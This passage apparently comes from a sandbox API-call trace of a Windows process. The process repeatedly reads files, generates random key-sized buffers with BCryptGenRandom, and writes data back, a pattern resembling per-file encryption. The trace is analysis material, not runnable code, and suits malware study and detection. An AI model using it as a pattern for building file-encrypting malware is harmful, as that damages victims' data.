dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.695] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3f34, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.699] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.711] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4354, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.720] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.732] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3ef0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0103.733] CloseHandle (hObject=0x81c) returned 1 [0103.735] free (_Block=0x1ff1e60) [0103.735] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0104.495] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0104.495] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0105.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.141] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0105.269] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0105.269] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0105.269] free (_Block=0x77d800) [0105.269] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0105.269] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0105.269] free (_Block=0x1fa4848) [0105.269] free (_Block=0x2071818) [0105.269] free (_Block=0x77d908) [0105.269] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.341] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.342] CloseHandle (hObject=0x81c) returned 1 [0105.342] free (_Block=0x1ff1e60) [0105.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0105.425] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.425] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0105.425] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0105.425] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0105.425] free (_Block=0x77d800) [0105.425] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0105.426] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0105.426] free (_Block=0x1fa4848) [0105.426] free (_Block=0x2071818) [0105.426] free (_Block=0x77d908) [0105.426] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.576] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.578] CloseHandle (hObject=0x81c) returned 1 [0105.578] free (_Block=0x1ff1e60) [0105.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.598] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0105.598] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.599] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0105.599] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0105.599] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0105.599] free (_Block=0x77d800) [0105.599] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0105.599] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0105.600] free (_Block=0x1fa4848) [0105.600] free (_Block=0x2071818) [0105.600] free (_Block=0x77d908) [0105.600] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.600] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.610] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.610] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.614] CloseHandle (hObject=0x81c) returned 1 [0105.616] free (_Block=0x1ff1e60) [0105.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0105.648] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.648] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.648] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0105.648] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0105.649] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0105.649] free (_Block=0x77d800) [0105.649] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0105.649] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0105.649] free (_Block=0x1fa4848) [0105.649] free (_Block=0x2071818) [0105.649] free (_Block=0x77d908) [0105.649] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.650] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0105.700] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x5f00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.779] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.287] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x60ca, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.293] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.306] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbb7c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.308] CloseHandle (hObject=0x81c) returned 1 [0106.310] free (_Block=0x1ff1e60) [0106.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.318] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.318] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.318] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.319] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.319] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.319] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.319] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.319] free (_Block=0x77d800) [0106.319] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.319] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.320] free (_Block=0x1fa4848) [0106.320] free (_Block=0x2071818) [0106.320] free (_Block=0x77d908) [0106.320] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.322] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x9d10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.322] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.323] CloseHandle (hObject=0x81c) returned 1 [0106.323] free (_Block=0x1ff1e60) [0106.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.332] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.332] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.332] free (_Block=0x77d800) [0106.332] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.332] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.332] free (_Block=0x1fa4848) [0106.332] free (_Block=0x2071818) [0106.332] free (_Block=0x77d908) [0106.332] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.333] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.334] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbab0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.334] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.347] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x38cc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.348] CloseHandle (hObject=0x81c) returned 1 [0106.349] free (_Block=0x1ff1e60) [0106.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.363] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.363] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.363] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.363] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.363] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.363] free (_Block=0x77d800) [0106.363] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.363] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.364] free (_Block=0x1fa4848) [0106.364] free (_Block=0x2071818) [0106.364] free (_Block=0x77d908) [0106.364] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.364] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.367] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.368] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.368] CloseHandle (hObject=0x81c) returned 1 [0106.369] free (_Block=0x1ff1e60) [0106.369] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.377] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.377] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.377] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.377] free (_Block=0x77d800) [0106.377] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.377] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.378] free (_Block=0x1fa4848) [0106.378] free (_Block=0x2071818) [0106.378] free (_Block=0x77d908) [0106.378] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.379] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1f20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.389] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x34cb, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.390] CloseHandle (hObject=0x81c) returned 1 [0106.394] free (_Block=0x1ff1e60) [0106.394] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0106.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0106.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0106.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0106.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0106.403] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0106.403] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0106.403] free (_Block=0x77d800) [0106.403] calloc (_Count=0x41, _Size=0x4) returned 0x1fa4848 [0106.403] calloc (_Count=0x82, _Size=0x4) returned 0x2071818 [0106.404] free (_Block=0x1fa4848) [0106.404] free (_Block=0x2071818) [0106.404] free (_Block=0x77d908) [0106.404] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | 